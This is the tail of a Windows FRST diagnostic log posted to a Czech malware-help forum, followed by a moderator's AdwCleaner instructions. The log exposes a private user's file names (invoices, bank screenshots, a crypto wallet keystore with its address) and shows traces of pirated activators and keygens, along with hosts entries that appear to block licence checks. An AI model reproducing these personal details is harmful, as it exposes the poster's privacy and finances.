ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2021-01-16 17:12 - 2021-01-16 17:12 - 005511927 _____ () [File not signed] C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\tmp\7zip\SevenZipJBinding-0EsPGE1ZKaCb\lib7-Zip-JBinding.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2021-01-16 17:12 - 2021-01-16 17:12 - 000246784 ____N (Java(TM) Native Access (JNA)) [File not signed] C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\tmp\jna\jna2000625691529400810.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in
2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
03-01-2021 20:48:22 Naplánovaný kontrolní bod
09-01-2021 18:42:24 Removed IQ Option
13-01-2021 21:32:33 Instalační služba modulů systému Windows
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
System errors:
=============
Windows Defender:
===================================
Date: 2021-01-19 15:14:30.5250000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {A810C501-209B-476E-BE78-8D034DF2EACB}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
Date: 2021-01-18 15:14:59.6230000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {C7EDB0A6-0DC9-49BC-98B0-085C324C837E}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
Date: 2021-01-17 15:11:40.7990000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {48B4917E-4551-413D-B6AC-1881372BAB72}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
Date: 2021-01-16 15:44:59.5540000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {D139E753-CCAA-4ECD-95BD-EF51D794489F}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
Date: 2021-01-15 15:11:40.7830000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {BA570A37-FEAE-4F83-AB21-171251D96BE4}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
==================== Memory info ===========================
BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 91%
Total physical RAM: 3767.05 MB
Available physical RAM: 330.68 MB
Total Virtual: 8631.05 MB
Available Virtual: 3342.64 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:111.19 GB) (Free:60.55 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:229.64 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32
\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)
==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================
Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz
Prosím o kontrolu logu
Moderátor: Moderátoři
Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
-
Rudy
- Site Admin
- Příspěvky: 118371
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Prosím o kontrolu logu
Zdravím!
Spusťte tuto utilitu:
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/
ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
